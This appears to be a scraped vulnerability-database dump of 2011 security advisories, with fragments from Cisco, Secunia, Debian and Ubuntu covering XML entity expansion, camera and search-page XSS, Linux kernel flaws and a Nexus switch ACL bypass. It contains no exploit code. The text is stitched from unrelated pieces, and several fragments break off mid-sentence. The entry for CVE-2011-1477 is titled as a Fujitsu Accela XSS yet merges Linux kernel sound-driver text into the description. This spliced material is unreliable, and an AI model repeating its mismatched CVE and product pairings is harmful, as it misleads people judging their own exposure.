The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
XML entity expansion attacks are well known, but Cisco PSIRT is not
aware of any public announcements or malicious use of the
vulnerability against the Cisco products in this advisory.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20110928-xcpcupsxml.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2011-September-28 | Initial public release |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAk6Cp2sACgkQQXnnBKKRMNBL5AD/U+9K5lhXNsuQ8VwDsJ8JcUL1
W9OUjYEUtuGBytfhimEA/2wOZIkhVHkXO9QHazNI93kZY4mDumxfxTyA3pqDex98
=SUS0
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
The new Secunia Corporate Software Inspector (CSI) 5.0
Integrates with Microsoft WSUS & SCCM and supports Apple Mac OS X.
The vulnerability is caused due to an error when handling certain XML
requests, which can be exploited to e.g.
This may be related to:
SA44787
SOLUTION:
Update to versions 5.4.0.27581 or 5.8.1.27561.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20110928-xcpcupsxml.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor
VAR-201302-0004 | CVE-2011-5261 | AXIS M10 Series Network Cameras M1054 Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in serverreport.cgi in Axis M10 Series Network Cameras M1054 firmware 5.21 and earlier allows remote attackers to inject arbitrary web script or HTML via the pageTitle parameter to admin/showReport.shtml.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Axis M1054 firmware 5.21 is vulnerable; other version may also be affected. ----------------------------------------------------------------------
Secunia is hiring!
Find your next job here:
http://secunia.com/company/jobs/
----------------------------------------------------------------------
TITLE:
Axis M10 Series Network Cameras "pageTitle" Cross-Site Scripting
Vulnerability
SECUNIA ADVISORY ID:
SA47037
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/47037/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=47037
RELEASE DATE:
2011-12-07
DISCUSS ADVISORY:
http://secunia.com/advisories/47037/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/47037/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=47037
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Matt Metzger has reported a vulnerability in Axis M10 Series Network
Cameras, which can be exploited by malicious people to conduct
cross-site scripting attacks.
Input passed to the "pageTitle" parameter in admin/showReport.shtml
(when "content" is set to "serverreport.cgi") is not properly
sanitised before being returned to the user.
Other versions may also be affected.
SOLUTION:
Filter malicious characters and character sequences using a proxy.
PROVIDED AND/OR DISCOVERED BY:
Matt Metzger
ORIGINAL ADVISORY:
http://metzgersecurity.blogspot.com/2011/11/xss-vulnerability-axis-m10-series.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201206-0031 | CVE-2011-1477 | Fujitsu Accela BizSearch Unknown Cross-Site Scripting Vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
Multiple array index errors in sound/oss/opl3.c in the Linux kernel before 2.6.39 allow local users to cause a denial of service (heap memory corruption) or possibly gain privileges by leveraging write access to /dev/sequencer. The standard search page of Accela BizSearch contains a cross-site scripting vulnerability.By setting up a fraudulent website that exploits an XSS vulnerability of the Accela BizSearch's standard search page (the "targeted website") via the Internet, a remote attacker could execute arbitrary code on the computer of the visitors (the "victims") who have accessed the website. Fujitsu Accela BizSearch has an input validation vulnerability that allows attackers to perform cross-site scripting attacks. The attacker can construct a malicious WEB page, entice the user to parse, obtain sensitive information or hijack the user session. Linux kernel is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial-of-service condition. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following products are affected:
eAccela BizSearch 1.0
eAccela BizSearch 2.0
eAccela BizSearch 2.1
Accela BizSearch 3.0
Accela BizSearch 3.1. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2264-1 security@debian.org
http://www.debian.org/security/ dann frazier
June 18, 2011 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : linux-2.6
Vulnerability : privilege escalation/denial of service/information leak
Problem type : local/remote
Debian-specific: no
CVE Id(s) : CVE-2010-2524 CVE-2010-3875 CVE-2010-4075 CVE-2010-4655
CVE-2011-0695 CVE-2011-0710 CVE-2011-0711 CVE-2011-0726
CVE-2011-1010 CVE-2011-1012 CVE-2011-1017 CVE-2011-1078
CVE-2011-1079 CVE-2011-1080 CVE-2011-1090 CVE-2011-1093
CVE-2011-1160 CVE-2011-1163 CVE-2011-1170 CVE-2011-1171
CVE-2011-1172 CVE-2011-1173 CVE-2011-1180 CVE-2011-1182
CVE-2011-1477 CVE-2011-1493 CVE-2011-1577 CVE-2011-1593
CVE-2011-1598 CVE-2011-1745 CVE-2011-1746 CVE-2011-1748
CVE-2011-1759 CVE-2011-1767 CVE-2011-1768 CVE-2011-1776
CVE-2011-2022 CVE-2011-2182
Debian Bug : 618485
Several vulnerabilities have been discovered in the Linux kernel that may lead
to a privilege escalation, denial of service or information leak. The Common
Vulnerabilities and Exposures project identifies the following problems:
CVE-2010-2524
David Howells reported an issue in the Common Internet File System (CIFS).
Local users could cause arbitrary CIFS shares to be mounted by introducing
malicious redirects.
CVE-2010-3875
Vasiliy Kulikov discovered an issue in the Linux implementation of the
Amateur Radio AX.25 Level 2 protocol. Local users may obtain access to
sensitive kernel memory.
CVE-2010-4075
Dan Rosenberg reported an issue in the tty layer that may allow local
users to obtain access to sensitive kernel memory.
CVE-2011-0695
Jens Kuehnel reported an issue in the InfiniBand stack. Remote attackers can
exploit a race condition to cause a denial of service (kernel panic).
CVE-2011-0710
Al Viro reported an issue in the /proc/<pid>/status interface on the
s390 architecture. Local users could gain access to sensitive memory
in processes they do not own via the task_show_regs entry.
CVE-2011-0711
Dan Rosenberg reported an issue in the XFS filesystem. Local users may
obtain access to sensitive kernel memory.
CVE-2011-0726
Kees Cook reported an issue in the /proc/pid/stat implementation. Local
users could learn the text location of a process, defeating protections
provided by address space layout randomization (ASLR).
CVE-2011-1010
Timo Warns reported an issue in the Linux support for Mac partition tables.
CVE-2011-1012
Timo Warns reported an issue in the Linux support for Mac partition tables.
CVE-2011-1017
Timo Warns reported an issue in the Linux support for LDM partition tables.
Users with physical access can gain access to sensitive kernel memory or
gain elevated privileges by adding a storage device with a specially
crafted LDM partition.
CVE-2011-1078
Vasiliy Kulikov discovered an issue in the Bluetooth subsystem. Local users
can obtain access to sensitive kernel memory.
CVE-2011-1079
Vasiliy Kulikov discovered an issue in the Bluetooth subsystem.
CVE-2011-1080
Vasiliy Kulikov discovered an issue in the Netfilter subsystem. Local users
can obtain access to sensitive kernel memory.
CVE-2011-1090
Neil Horman discovered a memory leak in the setacl() call on NFSv4
filesystems. Local users can exploit this to cause a denial of service
(Oops).
CVE-2011-1093
Johan Hovold reported an issue in the Datagram Congestion Control Protocol
(DCCP) implementation. Remote users could cause a denial of service by
sending data after closing a socket.
CVE-2011-1160
Peter Huewe reported an issue in the Linux kernel's support for TPM security
chips.
CVE-2011-1163
Timo Warns reported an issue in the kernel support for Alpha OSF format disk
partitions. Users with physical access can gain access to sensitive kernel
memory by adding a storage device with a specially crafted OSF partition.
CVE-2011-1170
Vasiliy Kulikov reported an issue in the Netfilter arp table
implementation.
CVE-2011-1171
Vasiliy Kulikov reported an issue in the Netfilter IP table
implementation.
CVE-2011-1172
Vasiliy Kulikov reported an issue in the Netfilter IP6 table
implementation.
CVE-2011-1173
Vasiliy Kulikov reported an issue in the Acorn Econet protocol
implementation. Local users can obtain access to sensitive kernel memory on
systems that use this rare hardware.
CVE-2011-1180
Dan Rosenberg reported a buffer overflow in the Information Access Service
of the IrDA protocol, used for Infrared devices. Remote attackers within IR
device range can cause a denial of service or possibly gain elevated
privileges.
CVE-2011-1182
Julien Tinnes reported an issue in the rt_sigqueueinfo interface. Local
users can generate signals with falsified source pid and uid information.
CVE-2011-1477
Dan Rosenberg reported issues in the Open Sound System driver for cards that
include a Yamaha FM synthesizer chip. This issue does not affect
official Debian Linux image packages as they no longer provide support for
OSS. However, custom kernels built from Debians linux-source-2.6.32 may
have enabled this configuration and would therefore be vulnerable.
CVE-2011-1493
Dan Rosenburg reported two issues in the Linux implementation of the
Amateur Radio X.25 PLP (Rose) protocol. A remote user can cause a denial of
service by providing specially crafted facilities fields.
CVE-2011-1577
Timo Warns reported an issue in the Linux support for GPT partition tables.
Local users with physical access could cause a denial of service (Oops)
by adding a storage device with a malicious partition table header.
CVE-2011-1593
Robert Swiecki reported a signednes issue in the next_pidmap() function,
which can be exploited my local users to cause a denial of service.
CVE-2011-1598
Dave Jones reported an issue in the Broadcast Manager Controller Area
Network (CAN/BCM) protocol that may allow local users to cause a NULL
pointer dereference, resulting in a denial of service.
CVE-2011-1745
Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian
installations, this is exploitable only by users in the video group.
CVE-2011-1746
Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian installations, this is
exploitable only by users in the video group.
CVE-2011-1748
Oliver Kartkopp reported an issue in the Controller Area Network (CAN) raw
socket implementation which permits ocal users to cause a NULL pointer
dereference, resulting in a denial of service.
CVE-2011-1759
Dan Rosenberg reported an issue in the support for executing "old ABI"
binaries on ARM processors. Local users can obtain elevated privileges due
to insufficient bounds checking in the semtimedop system call.
CVE-2011-1767
Alexecy Dobriyan reported an issue in the GRE over IP implementation.
Remote users can cause a denial of service by sending a packet during
module initialization.
CVE-2011-1768
Alexecy Dobriyan reported an issue in the IP tunnels implementation.
Remote users can cause a denial of service by sending a packet during
module initialization.
CVE-2011-1776
Timo Warns reported an issue in the Linux implementation for GUID
partitions. Users with physical access can gain access to sensitive kernel
memory by adding a storage device with a specially crafted corrupted
invalid partition table.
CVE-2011-2022
Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian
installations, this is exploitable only by users in the video group.
CVE-2011-2182
Ben Hutchings reported an issue with the fix for CVE-2011-1017 (see above)
that made it insufficient to resolve the issue.
For the oldstable distribution (lenny), this problem has been fixed in
version 2.6.26-26lenny3. Updates for arm and hppa are not yet available,
but will be released as soon as possible.
The following matrix lists additional source packages that were rebuilt for
compatibility with or to take advantage of this update:
Debian 5.0 (lenny)
user-mode-linux 2.6.26-1um-2+26lenny3
We recommend that you upgrade your linux-2.6 and user-mode-linux packages.
These updates will not become active until after your system is rebooted.
Note: Debian carefully tracks all known security issues across every
linux kernel package in all releases under active security support.
However, given the high frequency at which low-severity security
issues are discovered in the kernel and the resource requirements of
doing an update, updates for lower priority issues will normally not
be released for all kernels at the same time. Rather, they will be
released in a staggered or "leap-frog" fashion.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iQIcBAEBAgAGBQJN/Uv8AAoJEBv4PF5U/IZAp7QQAJmbSplvSgno69C0IFRzRgGI
FS3B6uq5zNcvucQ4O2u5Zj/rPRef/M2Lxj4Vx/9FQ+4SlV/Ryazu3iknLL2iyc8a
3zZBbo6S/OvhK0Prfd88ItCxXviYJchY91qp7Pm5TOkE1rM43XLhDAi1T1W507tY
2rgqUfWkmN0Xq4Ykh3uySsIH6VkLqC5Ay7n5jXapdf3wJkyl1pg/iu0ndTnHaRTC
ByQehIMbj4OOivOcy06lS89Aro+KkgPRaA0lp5enegxUZTs5S5AIo7h6v9U078xr
bcUcfrOsiTpVuTRND1L7kQQhPjmIv+UlzFjYuGPbHQxfZRVnVIlB4Ny3jIyN1aBx
DMqxGR+novsYIuXAZWlsF17UYQXW5CFe+7aeS06bdaWWemJGkV0Mkfb72fwa3uLz
sXlLp6fju2N5RQW7WVfjx89X7SAjKmYwQnCMbo0mwdRfujBNgbkm2xCrDy+QIE23
5BnAY18kXpqaRbXPJB0sy8V99Wnl1ZSRRzX0kOZVecrhKAoCUGPJS2X+bDEtIzhB
OWzxcC7P94hega5JYzteSZcyBkGRUj4604NCzD38OdPqqWvR3oWtwDRAKIR7gZ/L
PRoDZucqfYV+BhXy/ib55qTo/va5gjmnlUFMP2G/TVQk9XQ/q8TxxefmnQc+Qy3A
P/Hlaop/HijmZLuNpJB4
=dXCB
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Frost & Sullivan 2011 Report: Secunia Vulnerability Research
\"Frost & Sullivan believes that Secunia continues to be a major player in the vulnerability research market due to its diversity of products that provide best-in-class coverage, quality, and usability.\" This is just one of the key factors that influenced Frost & Sullivan to select Secunia over other companies.
Read the report here:
http://secunia.com/products/corporate/vim/fs_request_2011/
----------------------------------------------------------------------
TITLE:
Accela / eAccela BizSearch Search Cross-Site Scripting Vulnerability
SECUNIA ADVISORY ID:
SA45105
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45105/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45105
RELEASE DATE:
2011-06-29
DISCUSS ADVISORY:
http://secunia.com/advisories/45105/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45105/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45105
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Accela / eAccela BizSearch,
which can be exploited by malicious people to conduct cross-site
scripting attacks.
Please see the vendor's advisory for the list of affected versions.
SOLUTION:
Contact the vendor for patches.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
Fujitsu (Japanese):
http://software.fujitsu.com/jp/security/products-fujitsu/solution/bizsearch201103.html
JVN (English):
http://jvndb.jvn.jp/en/contents/2010/JVNDB-2010-002807.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Software Description:
- linux-ti-omap4: Linux kernel for OMAP4
Details:
Aristide Fattori and Roberto Paleari reported a flaw in the Linux kernel's
handling of IPv4 icmp packets.
(CVE-2010-4250)
An error was discovered in the kernel's handling of CUSE (Character device
in Userspace). (CVE-2010-4650)
A flaw was found in the kernel's Integrity Measurement Architecture (IMA).
Changes made by an attacker might not be discovered by IMA, if SELinux was
disabled, and a new IMA rule was loaded. (CVE-2011-0006)
A flaw was found in the Linux Ethernet bridge's handling of IGMP (Internet
Group Management Protocol) packets. (CVE-2011-1759)
Ben Hutchings reported a flaw in the kernel's handling of corrupt LDM
partitions. (CVE-2011-2182)
A flaw was discovered in the Linux kernel's AppArmor security interface
when invalid information was written to it. (CVE-2011-3619)
It was discovered that some import kernel threads can be blocked by a user
level process. (CVE-2012-0038)
Chen Haogang discovered an integer overflow that could result in memory
corruption. A local unprivileged user could use this to crash the system.
(CVE-2012-0044)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 10.10:
linux-image-2.6.35-903-omap4 2.6.35-903.32
After a standard system update you need to reboot your computer to make
all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-1394-1
CVE-2010-4250, CVE-2010-4650, CVE-2011-0006, CVE-2011-0716,
CVE-2011-1476, CVE-2011-1477, CVE-2011-1759, CVE-2011-1927,
CVE-2011-2182, CVE-2011-3619, CVE-2011-4621, CVE-2012-0038,
CVE-2012-0044
Package Information:
https://launchpad.net/ubuntu/+source/linux-ti-omap4/2.6.35-903.32
.
CVE-2011-1016
Marek Olšák discovered an issue in the driver for ATI/AMD Radeon video
chips.
This update also includes changes queued for the next point release of
Debian 6.0, which also fix various non-security issues.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed. If
you use linux-restricted-modules, you have to update that package as
well to get modules which work with the new kernel version. Unless you
manually uninstalled the standard kernel metapackages (e.g. linux-generic,
linux-server, linux-powerpc), a standard system upgrade will automatically
perform this as well
VAR-201109-0073 | CVE-2011-2581 | Cisco Nexus 5000 and 3000 Vulnerabilities that can bypass access restrictions in series switches |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The ACL implementation in Cisco NX-OS 5.0(2) and 5.0(3) before 5.0(3)N2(1) on Nexus 5000 series switches, and NX-OS before 5.0(3)U1(2a) on Nexus 3000 series switches, does not properly handle comments in conjunction with deny statements, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by sending packets, aka Bug IDs CSCto09813 and CSCtr61490. The problem is Bug IDs CSCto09813 and CSCtr61490 It is a problem.Access restrictions may be avoided by sending packets by a third party. The Cisco Nexus Series switches are data center switches. This vulnerability can be triggered when ACL remark is configured before any DENY statements in these ACLs. All ACEs after Remark are affected by this vulnerability, which includes the default implicit DENY at the end of the ACL. IPv4, IPv6, and MAC ACLs are affected, and QoS classification and route-map ACLs are not affected by this vulnerability.
An attacker can exploit this issue to bypass access control lists (ACLs) and gain access to restricted resources. This may aid in further attacks.
This issue is documented by the Cisco Bug IDs CSCto09813 and CSCtr61490. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Cisco Nexus Series Switches ACL Deny Statement Security Bypass
Security Issue
SECUNIA ADVISORY ID:
SA45883
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45883/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45883
RELEASE DATE:
2011-09-09
DISCUSS ADVISORY:
http://secunia.com/advisories/45883/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45883/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45883
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A security issue has been reported in Cisco NX-OS, which can be
exploited by malicious people to bypass certain security
restrictions.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20110907-nexus.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Cisco has released free software updates that address this
vulnerability.
A workaround is available to mitigate this vulnerability. A remark is a
comment about the configured access control entry (ACE).
Determining Software Version
To determine the Cisco NX-OS Software release that is running on a
Cisco product, administrators can log in to the device and issue the
show version command to display the system banner. The following
example shows how to display the version information for the
kickstart and system image running on a device that runs Cisco NX-OS
Release 5.0(2)N2(1):
switch# show version
Cisco Nexus Operating System (NX-OS) Software
TAC support: http://www.cisco.com/tac
Copyright (c) 2002-2010, Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained herein are owned by
other third parties and are used and distributed under license.
Some parts of this software are covered under the GNU Public
License. A copy of the license is available at
http://www.gnu.org/licenses/gpl.html.
Software
BIOS: version 1.3.0
loader: version N/A
kickstart: version 5.0(2)N2(1) [build 5.0(2)N2(1)]
system: version 5.0(2)N2(1) [build 5.0(2)N2(1)]
!--- output truncated
Products Confirmed Not Vulnerable
+--------------------------------
The following Cisco products are confirmed not to be affected by this
vulnerability.
Details
=======
An ACL is an ordered set of rules that filter traffic. Each rule
specifies a set of conditions that a packet must satisfy to match the
rule. When the device determines that an ACL applies to a packet, it
tests the packet against the conditions of all rules. The first
matching rule determines whether the packet is permitted or denied.
If there is no match, the device applies the applicable implicit
rule. The device continues processing packets that are permitted and
drops packets that are denied.
Note: All the ACEs after a remark are affected.
This vulnerability is documented in Cisco bug IDs CSCto09813 (
registered customers only) and CSCtr61490 ( registered customers
only) ; and has been assigned CVE ID CVE-2011-2581.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCto09813 and CSCtr61490 - Access Control List Bypass Vulnerability
CVSS Base Score - 5
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - None
Availability Impact - None
CVSS Temporal Score - 4.1
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerability may allow an attacker to
access resources that should be protected by the ACL configured in
Cisco Nexus 5000 and 3000 Series Switches.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance. As a
workaround, remarks can be removed from the configuration to mitigate
this vulnerability.
Obtaining Fixed Software
========================
Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
